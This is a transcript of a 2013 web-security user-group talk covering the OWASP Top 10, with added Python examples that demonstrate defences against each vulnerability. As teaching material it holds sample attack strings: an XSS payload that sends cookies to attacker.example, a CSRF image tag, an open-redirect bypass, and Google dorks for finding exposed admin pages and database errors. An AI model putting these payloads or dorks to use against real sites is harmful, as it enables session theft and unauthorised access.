Dallas Web Security Group - February Meeting - Addressing Top Security Threats

Credera is a full-service management and technology consulting firm. Our clients range from Fortune 1,000 companies to emerging industry leaders. We provide expert, objective advice to help solve complex business and technology challenges. Dallas Office 15303 Dallas Parkway Suite 300 Addison, TX 75001 972.692.0010 Phone 972.692.0019 Fax Denver Office 5445 DTC Parkway Suite 1040 Greenwood Village, CO 80111 303.623.1344 Phone 303.484.4577 Fax Houston Office 800 Town & Country Blvd Suite 300 Houston, TX 77024 713.496.0711 Phone 713.401.9650 Fax Austin Office 9020 N Capital of Texas Hwy Suite 345 Austin, TX 78759 512.327.1112 Phone 512.233.0844 Fax


Dustin Talk and Josh Hamit presented this at the Dallas Web Security Group's February Meeting.

Transcript of Dallas Web Security Group - February Meeting - Addressing Top Security Threats


Discussion document – Strictly Confidential & Proprietary

Addressing Top Security Threats in Web Applications

Dallas, TX

February 12, 2013

Dallas Web Security Group Inaugural Meeting

Dustin Talk

Josh Hamit

04/08/2023

Dallas Web Security Group

3

Agenda …

Welcome to the Dallas Web Security User Group, where we will discuss all things related to web security

• Introductions

• Expectations and Objectives

• Why is Security Important?

• What are Common Security Issues?

– The OWASP Top 10

• How Common are Security Vulnerabilities?

– 2012 Research Findings

• Looking at Some Examples

– SQL Injection (SQLi)

– Cross Site Scripting (XSS)

– A Real Life Example

• What Can I do?

• Q&A


Introductions


Dustin Talk and Josh Hamit (both not Anonymous)

Dustin Talk

Dustin Talk is an Architect with Credera in the eCommerce practice. He holds a B.S. and a Master's degree in Computer Science from Texas A&M University. Dustin has several years' experience in custom web application development with a focus on security, emerging technologies, and the Spring/JPA frameworks. During his tenure with Credera, he has led and worked on various teams building applications in Java, including supply chain optimization, large-scale eCommerce implementations utilizing Broadleaf Commerce, and eCommerce conversion efforts.

Past Presentations:

• OWASP Top 10 - Live Exploits by Example
• Stripe’s Capture The Flag #2
• OAuth 1.0 / 2.0
• OpenID

Josh Hamit

Joshua Hamit is a Consultant in the Custom Java Development Practice at Credera. He earned his B.B.A. in Management Information Systems from Baylor University. Joshua has several years' experience designing and implementing technology solutions utilizing a broad range of technologies while adhering to industry best practices. While at Credera, he has led the design and implementation of multiple single sign-on authentication systems, enterprise integrations, complex UI solutions, analytic tracking pixels, and mobile web applications.

Past Presentations:

• Addressing Cross-Cutting Concerns with AOP
• Functional Testing with Geb
• Stripe’s Capture The Flag #2
• Effective Front-End Design with SASS


Expectations and Objectives


The Organizational Goal is to equip you with knowledge that you may incorporate in your job, your next project, or just to have fun (not lulz)

Participant Expectations

• Focus on DFW Area
• Provide Education to Seed Investigation
• Learn more about Software / Infrastructure / etc…


Why is Security Important?


Not limited to business, the web is a means to showcase capabilities and engage with others, which gives attackers a variety of attack vectors that must be defended

The Importance of Security

• Legal Risk: Many organizations are legally bound to protect privacy and security; this is often an integral part of application development
– COPPA
– HIPAA
– Sarbanes-Oxley
– PCI Compliance
• Financial Risk: Computer security attacks cost $48 billion in 2011
– 2011 cost of an individual data breach estimated to be $5.5 million
– Organized hacking groups may be better funded than your IT department
• Reputation Risk: Trust is a key component of customer adoption and retention
– 20% of businesses that lost data lost customers as a direct result
– The reputation impact of a single angry customer may reach 40-80 people
• Doxing: Living in a digital information age allows others to know more about you than ever before
– Expectation of privacy, when there may be none due to data leakage
– Can be used to encroach on physical security

*https://devcentral.f5.com/blogs/us/quantifying-reputation-loss-from-a-breach
http://www.informationweek.com/security/attacks/data-breach-costs-drop/232602891
http://www.druva.com/blog/2012/08/15/security-breaches-are-on-the-rise-but-preventable/


With constant code deployments and a steady stream of newly released exploits, web security must remain a constant organizational priority

The Importance of Security

Website security is a moving target. New attack techniques are frequently disclosed. New website launches are common. New Web technologies are made available every day. New application code is released constantly. Enterprises need timely information about how they can best defend their websites, gain visibility into their vulnerability lifecycle, measure the performance of their security programs, and determine how they compare to their industry peers. Establishing these metrics is crucial towards improving enterprise security.

*Figure and statistics from June 2012 WhiteHat Security Statistics Report


What are Common Security Issues?


OWASP compiles vulnerability data contributed by security consultancies and tool vendors to produce the OWASP Top 10, a ranked list of the most critical web application security risks; the list shown here is the 2010 edition

#1 – Injection

*Data provided by the Open Web Application Security Project

Pro Tip: Let Google find pages that leak database errors for you by searching for them (ex: intext:"SQL syntax" inurl:index.php?id= inurl:edu). Treat this as reconnaissance only; never test a site you are not authorized to test


#2 – Cross Site Scripting (XSS)

Pro Tip: Use a cheat sheet when penetration testing for this (http://ha.ckers.org/xsscalc.html)

Occurs any time…

• Raw data from attacker is sent to an innocent user’s browser

Raw data…

• Stored in database
• Reflected from web input (form field, hidden field, URL, etc…)
• Sent directly into rich JavaScript client

Virtually every web application has this problem

• Try this in your browser – javascript:alert(document.cookie)

Typical Impact

• Steal user’s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site
• Most Severe: Install XSS proxy which allows attacker to observe and direct all user’s behavior on vulnerable site and force user to other sites
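As an added example for the XSS slide (my code, not the deck's): a search page that reflects the query into an HTML attribute and into element content, first unencoded and then passed through Python's `html.escape`. The page template and the two payloads are constructed for the demo, and `payload_survives` is a crude substring test standing in for a browser. The escaping shown is correct for element content and double-quoted attributes only; a value dropped into a `<script>` block, a URL or an event handler needs that context's own encoder.

```python
import html

# Constructed attack strings for the demo: one for element content, one that
# breaks out of a double-quoted attribute and adds an event handler.
PAYLOAD_BODY = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(query: str) -> str:
    """Reflects the search term into two HTML contexts with no encoding."""
    return (
        '<form><input name="q" value="' + query + '"></form>\n'
        "<p>Results for " + query + "</p>"
    )


def render_safe(query: str) -> str:
    """Same page with the user-controlled value HTML-encoded in both places.

    html.escape(quote=True) turns < > & " ' into entities, so the browser
    renders the payload as text instead of parsing it as markup.
    """
    safe = html.escape(query, quote=True)
    return (
        '<form><input name="q" value="' + safe + '"></form>\n'
        "<p>Results for " + safe + "</p>"
    )


def payload_survives(page: str) -> bool:
    # True when the reflected input is still live markup: an injected script
    # element, or an injected event-handler attribute with a real quote.
    return "<script>" in page or ' onfocus="' in page


def demo() -> dict:
    return {
        "vulnerable_body": payload_survives(render_vulnerable(PAYLOAD_BODY)),  # True
        "vulnerable_attr": payload_survives(render_vulnerable(PAYLOAD_ATTR)),  # True
        "safe_body": payload_survives(render_safe(PAYLOAD_BODY)),             # False
        "safe_attr": payload_survives(render_safe(PAYLOAD_ATTR)),             # False
    }


if __name__ == "__main__":
    print(demo())
```

Note that the attribute payload contains no angle brackets at all; a filter that only strips `<script>` would pass it straight through, which is why output encoding per context beats input blacklists.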


#3 – Broken Authentication and Session Management

Pro Tip: Tools like Cookie Cadger can quickly check for session management and session hijacking issues

HTTP is a “stateless” protocol

• Means credentials have to go with every request
• Should use SSL for everything requiring authentication

Session management flaws

• SESSION ID used to track state since HTTP doesn’t
• and it is just as good as credentials to an attacker
• SESSION ID is typically exposed on the network, in browser, in logs, …

Beware the side-doors

• Change my password, remember my password, forgot my password, secret question, logout, email address, etc…

Typical Impact

• User accounts compromised or user sessions hijacked
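An added example (mine, not the deck's) of the session controls this slide implies: IDs drawn from the CSPRNG, rotation of the ID at login so a planted pre-auth ID is never upgraded (session fixation), server-side invalidation on logout, and a cookie flagged so it is neither sent over plain HTTP nor readable by the `document.cookie` trick on the XSS slide. The store, the cookie name `SESSIONID` and the `SameSite` attribute (a browser feature newer than the deck) are assumptions for the demo.

```python
import secrets
import time
from typing import Dict, Optional


class SessionStore:
    """Server-side session records keyed by an unguessable ID (constructed demo)."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)  # 256 random bits: not sequential, not guessable
        self._sessions[sid] = {"user": None, "created": time.time()}
        return sid

    def login(self, presented_sid: Optional[str], username: str) -> str:
        # Whatever ID the browser presented (possibly planted by an attacker,
        # or sniffed before login) is discarded; a fresh one is bound to the user.
        if presented_sid is not None:
            self._sessions.pop(presented_sid, None)
        sid = self.new_session()
        self._sessions[sid]["user"] = username
        return sid

    def user_for(self, sid: str) -> Optional[str]:
        record = self._sessions.get(sid)
        return record["user"] if record else None

    def logout(self, sid: str) -> None:
        # The ID is as good as credentials: kill it server-side so a copy left
        # in a log or captured on the wire is worthless afterwards.
        self._sessions.pop(sid, None)


def session_cookie_header(sid: str) -> str:
    # Secure:   never sent over plain HTTP, so it is not exposed on the network.
    # HttpOnly: not readable via document.cookie, so an XSS payload cannot lift it.
    # SameSite: not on the slide; also blunts the CSRF attack on the #5 slide.
    return f"Set-Cookie: SESSIONID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def fixation_demo() -> dict:
    store = SessionStore()
    planted = store.new_session()            # attacker obtains/plants this pre-auth ID
    victim = store.login(planted, "alice")   # victim logs in while carrying the planted ID
    result = {
        "ids_rotated": planted != victim,           # True
        "attacker_sees": store.user_for(planted),   # None: planted ID was never upgraded
        "victim_sees": store.user_for(victim),      # "alice"
    }
    store.logout(victim)
    result["after_logout"] = store.user_for(victim)  # None
    return result


if __name__ == "__main__":
    print(fixation_demo())
    print(session_cookie_header("example"))
```

The "side-doors" on the slide (change password, forgot password, remember me) all need the same treatment: each should re-verify the current credential or a fresh token before acting, and each should end by rotating the session the same way `login` does.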


#4 – Insecure Direct Object References

Pro Tip: Using Google’s cache feature can tell hackers how a page’s form used to appear on a site

How do you protect access to your data?

• This is part of enforcing proper “Authorization”, along with A8 – Failure to Restrict URL Access (#8 below)

A common mistake …

• Only listing the ‘authorized’ objects for the current user, or
• Hiding the object references in hidden fields
• … and then not enforcing these restrictions on the server side
• This is called presentation layer access control, and doesn’t work
• Attacker simply tampers with parameter value

Typical Impact

• Users are able to access unauthorized files or data


#5 – Cross Site Request Forgery (CSRF)

Pro Tip: HTML image tags can easily be used for CSRF, as the ‘src’ attribute can point at any HTTP location and does not have to be an image

Cross Site Request Forgery

• An attack where the victim’s browser is tricked into issuing a command to a vulnerable web application
• Vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, …) with each request

Imagine…

• What if a hacker could steer your mouse and get you to click on links in your online banking application?
• What could they make you do?

Typical Impact

• Initiate transactions (transfer funds, logout user, close account)
• Access sensitive data
• Change account details
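An added example (not from the deck) of why the `<img src=...>` trick in the Pro Tip works and of the synchronizer-token defence: the browser attaches the session cookie to the forged request automatically, so a transfer endpoint that checks only the cookie pays out; a per-session random token rendered into the legitimate form, which the attacker's page cannot read because of the same-origin policy, is what the forged request lacks. The `Bank` class, its accounts, the cookie value and the form markup are all constructed for the demo.

```python
import hmac
import secrets
from typing import Dict, Optional


class Bank:
    """Constructed demo application with and without CSRF protection."""

    def __init__(self) -> None:
        self.balances: Dict[str, int] = {"alice": 500}
        self.sessions: Dict[str, str] = {"cookie-abc": "alice"}  # session id -> user
        self.csrf_tokens: Dict[str, str] = {}                     # session id -> token

    def render_transfer_form(self, session_id: str) -> str:
        # Synchronizer token: random, bound to the session, carried in the
        # page body (never in a cookie, which the browser would auto-send too).
        token = secrets.token_hex(16)
        self.csrf_tokens[session_id] = token
        return (
            '<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>'
        )

    def transfer_unprotected(self, session_id: str, to: str, amount: int) -> int:
        # Only the cookie is checked, so a request the victim's browser was
        # tricked into sending, e.g. by
        # <img src="https://bank.example/transfer?to=mallory&amount=100">,
        # arrives fully authenticated and is honoured.
        user = self.sessions.get(session_id)
        if user is None:
            return 401
        self.balances[user] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount
        return 200

    def transfer(self, session_id: str, to: str, amount: int, csrf: Optional[str]) -> int:
        user = self.sessions.get(session_id)
        if user is None:
            return 401
        expected = self.csrf_tokens.get(session_id)
        if not (expected and csrf and hmac.compare_digest(expected, csrf)):
            return 403  # forged: cookie present, token missing or wrong
        self.balances[user] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount
        return 200


def token_from_form(form_html: str) -> str:
    # The legitimate page carries the token; attacker.example cannot read
    # this HTML cross-origin, so it cannot copy the value into its forgery.
    marker = 'name="csrf" value="'
    start = form_html.index(marker) + len(marker)
    return form_html[start:form_html.index('"', start)]


def demo() -> dict:
    bank = Bank()
    sid = "cookie-abc"  # the value the browser sends automatically
    forged = bank.transfer(sid, "mallory", 100, None)             # 403: no token
    forged_guess = bank.transfer(sid, "mallory", 100, "0" * 32)   # 403: wrong token
    token = token_from_form(bank.render_transfer_form(sid))
    legit = bank.transfer(sid, "carol", 50, token)                # 200
    drained = bank.transfer_unprotected(sid, "mallory", 100)      # 200: CSRF succeeds
    return {
        "forged": forged,
        "forged_guess": forged_guess,
        "legit": legit,
        "unprotected": drained,
        "alice_balance": bank.balances["alice"],  # 500 - 50 - 100 = 350
    }


if __name__ == "__main__":
    print(demo())
```

Two details matter in practice: state-changing operations should not be reachable by GET at all (that is what makes the image tag sufficient), and the token comparison uses `hmac.compare_digest` so a wrong guess cannot be refined by timing.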


#6 – Security Misconfiguration

Pro Tip: The Metasploit Framework provides a vast repository of tests for security misconfigurations


#7 – Insecure Cryptographic Storage

Pro Tip: Never store passwords as a plain, fast hash such as MD5 or SHA-1; use a slow, salted password hash such as bcrypt. In 3 days on old hardware we were able to reverse over 300,000 complex hashed passwords

Storing sensitive data insecurely

• Failure to identify all sensitive data
• Failure to identify all the places that this sensitive data gets stored
– Databases, files, directories, log files, backups, etc.
• Failure to properly protect this data in every location

Typical Impact

• Attackers access or modify confidential or private information
– e.g., credit cards, health care records, financial data (yours or your customers’)
• Attackers extract secrets to use in additional attacks
• Company embarrassment, customer dissatisfaction, and loss of trust
• Expense of cleaning up the incident, such as forensics, sending apology letters, reissuing thousands of credit cards, providing identity theft insurance
• Business gets sued and/or fined
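An added example (mine, not the deck's) of the Pro Tip's point: a wordlist attack on unsalted MD5 cracks every user who picked a common password with one hash per candidate, because identical passwords produce identical digests, while a salted, iterated password hash makes each guess cost the full work factor per user. bcrypt, which the slide recommends, is not in the Python standard library, so PBKDF2-HMAC-SHA256 from `hashlib` stands in for it here; it has the same salted, tunable-cost shape. The wordlist, the three user records and the iteration count are assumptions for the demo.

```python
import hashlib
import hmac
import os
from typing import Dict, List

# Constructed wordlist for the demo; real cracking lists run to billions of entries.
WORDLIST: List[str] = ["password", "123456", "letmein", "P@ssw0rd!", "dragon"]
ITERATIONS = 100_000  # work factor: raise it as hardware gets faster


def md5_unsalted(password: str) -> str:
    # What "just hashing" usually means in practice: fast and unsalted.
    return hashlib.md5(password.encode()).hexdigest()


def crack_unsalted(digests: List[str], wordlist: List[str]) -> Dict[str, str]:
    # One MD5 per candidate serves every stored digest at once: a lookup
    # table built from the wordlist recovers shared passwords in bulk.
    table = {md5_unsalted(w): w for w in wordlist}
    return {d: table[d] for d in digests if d in table}


def hash_password(password: str) -> str:
    # Salted, slow and tunable, the properties bcrypt gives you. The salt is
    # stored alongside the hash; it is not secret, it just kills shared tables.
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


def demo() -> dict:
    users = {"alice": "letmein", "bob": "dragon", "carol": "letmein"}
    # Legacy store: three MD5 digests, two identical because the password is shared.
    legacy = {u: md5_unsalted(p) for u, p in users.items()}
    cracked = crack_unsalted(list(legacy.values()), WORDLIST)
    # Salted KDF: the shared password now yields different strings, and each
    # guess costs ITERATIONS hash operations per user instead of one in total.
    salted = {u: hash_password(p) for u, p in users.items()}
    return {
        "cracked_count": sum(1 for d in legacy.values() if d in cracked),  # 3
        "legacy_collide": legacy["alice"] == legacy["carol"],              # True
        "salted_collide": salted["alice"] == salted["carol"],              # False
        "verify_ok": verify_password("letmein", salted["alice"]),          # True
        "verify_bad": verify_password("password", salted["alice"]),        # False
    }


if __name__ == "__main__":
    print(demo())
```

The stored string carries the algorithm and iteration count, so the work factor can be raised later and old records rehashed at next login without a migration of the whole table.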


#8 – Failure to Restrict URL Access

Pro Tip: Using Google you can quickly find admin login URLs (ex: search for “inurl:admin/login.php”)

For each URL, a site needs to do 3 things

• Restrict access to authenticated users (if not public)
• Enforce any user or role based permissions (if private)
• Completely disallow requests to unauthorized page types (e.g., config files, log files, source files, etc.)

Verify your architecture

• Use a simple, positive model at every layer
• Be sure you actually have a mechanism at every layer

Verify the implementation

• Forget automated analysis approaches
• Verify that each URL in your application is protected by either
– An external filter, like Java EE web.xml or a commercial product
– Or internal checks in YOUR code – Use ESAPI’s isAuthorizedForURL() method
• Verify the server configuration disallows requests to unauthorized file types
• Use WebScarab or your browser to forge unauthorized requests
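Slides #4 and #8 describe the same two-layer rule: a positive URL access model enforced in a filter before any handler runs, plus an ownership check on the specific object the request names. This added example (my code, not the deck's; it imitates the web.xml or ESAPI filter with a plain URL-to-roles map) shows both layers and the insecure direct object reference you get when the second one is skipped because "the UI only lists the user's own invoices". The URL policy, the invoice records and the request shape are assumptions for the demo.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Positive access-control model: every URL the application serves is listed
# with the roles allowed to reach it. Anything not listed is denied, which
# also covers config files, logs and source that should never be served.
URL_POLICY: Dict[str, set] = {
    "/": {"anonymous", "user", "admin"},
    "/account/invoice": {"user", "admin"},
    "/admin/users": {"admin"},
}

# Constructed sample records: each invoice belongs to exactly one user.
INVOICES: Dict[int, dict] = {
    1001: {"owner": "alice", "amount": 42.00},
    1002: {"owner": "bob", "amount": 1300.00},
}


@dataclass
class Request:
    path: str
    role: str                     # "anonymous", "user" or "admin"
    user: Optional[str] = None    # None when not authenticated
    params: Dict[str, str] = field(default_factory=dict)


def url_filter(req: Request) -> int:
    """The external filter layer (what web.xml security constraints do)."""
    allowed = URL_POLICY.get(req.path)
    if allowed is None:
        return 404  # default deny for unlisted URLs
    return 200 if req.role in allowed else 403


def invoice_handler_idor(req: Request) -> Tuple[int, Optional[dict]]:
    # The #4 mistake: presentation-layer access control. The UI only listed
    # the caller's invoices, so the handler trusts the id it is given.
    inv = INVOICES.get(int(req.params.get("id", "0")))
    return (200, inv) if inv else (404, None)


def invoice_handler(req: Request) -> Tuple[int, Optional[dict]]:
    # Object-level authorization: the id is attacker-controlled, so the server
    # checks that the record belongs to the caller (or the caller is admin).
    inv = INVOICES.get(int(req.params.get("id", "0")))  # real code validates the type too
    if inv is None:
        return 404, None
    if inv["owner"] != req.user and req.role != "admin":
        return 403, None
    return 200, inv


def dispatch(req: Request, handler=invoice_handler) -> Tuple[int, Optional[dict]]:
    status = url_filter(req)          # layer 1: may this role reach this URL at all?
    if status != 200:
        return status, None
    return handler(req)               # layer 2: may this user see this object?


def demo() -> dict:
    bob = Request("/account/invoice", "user", "bob", {"id": "1001"})  # bob tampers with the id
    return {
        "idor_status": dispatch(bob, invoice_handler_idor)[0],   # 200: alice's invoice leaks
        "checked_status": dispatch(bob)[0],                       # 403
        "own_invoice": dispatch(Request("/account/invoice", "user", "bob", {"id": "1002"}))[0],  # 200
        "anon_admin": dispatch(Request("/admin/users", "anonymous"))[0],          # 403
        "unlisted": dispatch(Request("/WEB-INF/web.xml", "admin", "root"))[0],    # 404
    }


if __name__ == "__main__":
    print(demo())
```

The filter alone is not enough: `bob` is a legitimate user of `/account/invoice`, so only the ownership check inside the handler stops him reading invoice 1001, which is exactly the "forge an unauthorized request in your browser" test the slide recommends.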


#9 – Insufficient Transport Layer Protection

Pro Tip: Although most servers prefer a TLS connection, many will still negotiate a weaker SSL 2.0 or 3.0 connection if the client asks for one; verify which protocol versions your server actually accepts rather than assuming

Transmitting sensitive data insecurely

• Failure to identify all sensitive data
• Failure to identify all the places that this sensitive data is sent
– On the web, to backend databases, to business partners, internal communications
• Failure to properly protect this data in every location

Typical Impact

• Attackers access or modify confidential or private information
– e.g., credit cards, health care records, financial data (yours or your customers’)
• Attackers extract secrets to use in additional attacks
• Company embarrassment, customer dissatisfaction, and loss of trust
• Expense of cleaning up the incident
• Business gets sued and/or fined


#10 – Unvalidated Redirects and Forwards

Pro Tip: Naive filters (including some WAF rules) try to prevent this by blocking the text “http://” in the redirect parameter; a protocol-relative target such as “//evil.example” carries no scheme, is resolved by browsers as an absolute URL to that host, and passes straight through

Web application redirects are very common

• And frequently include user supplied parameters in the destination URL
• If they aren’t validated, attacker can send victim to a site of their choice

Forwards (aka Transfer in .NET) are common too

• They internally send the request to a new page in the same application
• Sometimes parameters define the target page
• If not validated, attacker may be able to use unvalidated forward to bypass authentication or authorization checks

Typical Impact

• Redirect victim to phishing or malware site
• Attacker’s request is forwarded past security checks, allowing unauthorized function or data access
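An added example (not from the deck) of the Pro Tip's bypass and of a check that holds: the naive filter refuses anything containing `http://`, which neither a protocol-relative `//host` target nor an `https://` target contains, while the strict check accepts only a same-site path, with no scheme, no authority and no `//` or `/\` prefix that browsers would read as a host. The target strings in `CASES` are constructed for the demo; the verdicts are mine.

```python
from urllib.parse import urlsplit


def naive_is_safe(target: str) -> bool:
    # The check the Pro Tip describes: refuse anything containing "http://".
    return "http://" not in target.lower()


def is_safe_redirect(target: str) -> bool:
    """Allow only a path on this site.

    Must start with a single "/", and must carry no scheme and no authority.
    Browsers treat "//host" and "/\\host" as absolute URLs, so both prefixes
    are rejected before urlsplit even looks at the string.
    """
    if not target.startswith("/") or target.startswith(("//", "/\\")):
        return False
    parts = urlsplit(target)
    return not parts.scheme and not parts.netloc


# Constructed redirect targets with the verdict the strict check should give.
CASES = {
    "/account/settings": True,
    "/search?q=a%20b": True,
    "//evil.example/login": False,          # protocol-relative: no "http://" to match
    "/\\evil.example": False,               # backslash variant browsers normalise to //
    "https://evil.example/": False,         # "https://" never contains "http://"
    "http://evil.example/": False,          # the only case the naive filter catches
    "javascript:alert(document.cookie)": False,
}


def demo() -> dict:
    # For each target: (passes the naive filter?, passes the strict check?)
    return {t: (naive_is_safe(t), is_safe_redirect(t)) for t in CASES}


if __name__ == "__main__":
    for target, verdicts in demo().items():
        print(f"{target!r:40} naive={verdicts[0]!s:5} strict={verdicts[1]}")
```

Where the set of destinations is small, an allow-list of named targets (`?next=account` mapped server-side to a URL) removes the parsing question entirely and is preferable to any string check.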


How Common are Security Vulnerabilities?


The reality of Web Application Security is that while the total number of vulnerabilities is decreasing, we are not out of the woods yet

Vulnerabilities are Decreasing

• Web Application Firewall adoption has improved; WAFs could mitigate 71% of vulnerabilities
• Remediation rates are increasing: fixed in 38 days or faster in 2011
• Reduced Window of Exposure, from 233 days to 231 days
• Scope of scans increased to include Energy and Non-Profit

Dallas, TX is Vulnerable

• Texas is the nation’s second largest Cyberstate
• 456,500 High Tech Jobs

*Figure and statistics from June 2012 WhiteHat Security Statistics Report
http://www.druva.com/blog/2012/08/15/security-breaches-are-on-the-rise-but-preventable/
http://www.techamericafoundation.org/cyberstates2011-texas


Despite the overall improvement in vulnerability counts, the past year has been rough, with millions of accounts at the biggest sites exposed to hackers

A Year in Security Breaches

*Figure and statistics from Dashlane / Harris Interactive


Despite a reduction in the number of vulnerabilities discovered on average, the possibility of a serious vulnerability remains high

Serious Vulnerabilities

• 55% of websites contain Cross Site Scripting vulnerabilities
• Over half of websites expose sensitive data useful to intruders
• More than 1/3 of websites allow for content spoofing (used in phishing or brand attacks)

*Figure and statistics from June 2012 WhiteHat Security Statistics Report


Breaking down the data by industry confirms widely held beliefs about some industries but exposes others

Industries Compared

• Banking and Healthcare rank lower
• Education in the middle
• Retail and Insurance are the most exposed
• IT is number three?

A High Standard Deviation

• Companies typically get it and invest in it, or they don’t

*Figure and statistics from June 2012 WhiteHat Security Statistics Report


The time of exposure is directly related to developer and executive support for information and application security

Window of Exposure

• Vulnerabilities can and will happen to every company
• Significantly reduced risk is possible with organizational focus

*Figure and statistics from June 2012 WhiteHat Security Statistics Report


The time to fix vulnerabilities may be inhibited by the complexity of an organization, but the true time to fix involves a sense of Risk Management

Average Time to Fix Vulnerabilities

• 50% of Organizations required 38 days or less to remediate their serious vulnerabilities

*Figure and statistics from June 2012 WhiteHat Security Statistics Report


Vulnerability remediation can take many forms and fixes performed at only one level leave an opportunity for the issue to re-appear

Vulnerability Reopen Rates

The higher severity that a vulnerability has, the higher the likelihood that the vulnerability will reopen. Urgent: 23%, Critical: 22%, High: 15%.


*Figure and statistics from June 2012 WhiteHat Security Statistics Report


A Look at Some Examples (DEMO)


Anyone can set up an exploit in a sandboxed environment, but these are real vulnerabilities, live and in the wild

A simple cross site scripting attack


What Can I Do?


Attend More Meetings…

What To Do Now

• Develop Secure Code using Industry Best Practices
• Review your Applications using an External Team

What Not To Do

• With the rate of attacks, don’t attract unwanted attention
– http://www.youtube.com/watch?feature=player_detailpage&v=5gPt8HYMO7Q#t=69s

Reference Materials

• The Open Web Application Security Project
– https://www.owasp.org/


Q&A